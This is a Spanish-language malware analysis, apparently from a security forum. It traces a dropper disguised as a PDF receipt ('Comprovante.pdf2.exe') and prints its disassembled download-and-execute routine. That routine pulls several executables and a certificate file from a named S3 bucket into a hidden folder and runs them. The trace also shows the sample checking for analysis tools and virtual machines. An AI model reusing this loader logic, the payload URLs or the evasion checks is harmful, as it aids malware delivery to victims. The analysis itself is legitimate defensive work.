LoadLibrary(advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
VirtualQueryEx(c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcessToken(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
IsDebuggerPresent() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
BitBlt() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(b01a0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(13020c) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1001c4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(Pm.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetForegroundWindow() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1401a8) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetComputerName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\URLMON.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ResumeThread() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetSetOption() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetUserName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(secur32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Cookies\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetStartupMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetConnectionMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetProxyRegistryMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetGetConnectedState() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(DINPUTWINMM) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(netapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(tapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(winmm.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
RasEnumEntries() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\RASAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenSCManager((null),(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(RASMAN) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(userenv.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(WinNT,WinNT) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TEMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt40.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(crypt32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msasn1.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(cryptdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iphlpapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\WININET.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(Sens) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(sensapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetOpen() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetConnect(s3-sa-east-1.amazonaws.com) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(hnetcfg.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\USERENV.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
bind(port=0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:2673 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(imagehlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(crypt32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZoneAttributeCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesLockedCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpSendRequest() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasadhlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:9666 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateProcess((null),C:\wina\Projeto.exe,(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ExitProcess(0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(RegWatcher.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(arwwdwin.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(XueTr.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]

En la raiz del disco crea una carpeta oculta y de sistema "wina" donde se alojarán los archivos descargados:

Código [Seleccionar]

CODE:0045404B                 push    0
CODE:0045404D                 push    0
CODE:0045404F                 push    offset aCWinaJjca_dll ; "C:\\wina\\jjca.dll"
CODE:00454054                 push    offset aHttpsS3SaEast1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:00454059                 push    0
CODE:0045405B                 call    URLDownloadToFileA
CODE:00454060                 push    0
CODE:00454062                 push    0
CODE:00454064                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:00454069                 push    offset aHttpsS3SaEas_0 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045406E                 push    0
CODE:00454070                 call    URLDownloadToFileA
CODE:00454075                 push    5
CODE:00454077                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:0045407C                 call    WinExec
CODE:00454081                 push    0
CODE:00454083                 push    0
CODE:00454085                 push    offset aCWinaJsobs_exe ; "C:\\wina\\jsobs.exe"
CODE:0045408A                 push    offset aHttpsS3SaEas_1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045408F                 push    0
CODE:00454091                 call    URLDownloadToFileA
CODE:00454096                 push    0
CODE:00454098                 push    0
CODE:0045409A                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:0045409F                 push    offset aHttpsS3SaEas_2 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540A4                 push    0
CODE:004540A6                 call    URLDownloadToFileA
CODE:004540AB                 push    5
CODE:004540AD                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:004540B2                 call    WinExec
CODE:004540B7                 push    0
CODE:004540B9                 push    0
CODE:004540BB                 lea     edx, [ebp-4]
CODE:004540BE                 mov     eax, offset _str_LOCALAPPDATA.Text
CODE:004540C3                 call    @Sysutils@GetEnvironmentVariable$qqrx17System@AnsiString ; Sysutils::GetEnvironmentVariable(System::AnsiString)
CODE:004540C8                 lea     eax, [ebp-4]
CODE:004540CB                 mov     edx, offset _str_Low_Sun_Java_De.Text
CODE:004540D0                 call    @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
CODE:004540D5                 mov     eax, [ebp-4]
CODE:004540D8                 call    @System@@LStrToPChar$qqrx17System@AnsiString ; System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004540DD                 push    eax
CODE:004540DE                 push    offset aHttpsS3SaEas_3 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540E3                 push    0
CODE:004540E5                 call    URLDownloadToFileA
CODE:004540EA                 mov     eax, ds:off_456734
CODE:004540EF                 mov     eax, [eax]
CODE:004540F1                 call    @Forms@TApplication@Terminate$qqrv ; Forms::TApplication::Terminate(void)
CODE:004540F6                 xor     eax, eax
CODE:004540F8                 pop     edx
CODE:004540F9                 pop     ecx
CODE:004540FA                 pop     ecx
CODE:004540FB                 mov     fs:[eax], edx
CODE:004540FE                 jmp     short loc_45410A

Descarga de archivos y del certificado:

Archivos creados y conexión con URL:

Petición de archivo "sistema.html" no encontrado en el server:

Análisis del archivo "jsob.exe":

Código [Seleccionar]

Code:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msimg32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(winspool.drv) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
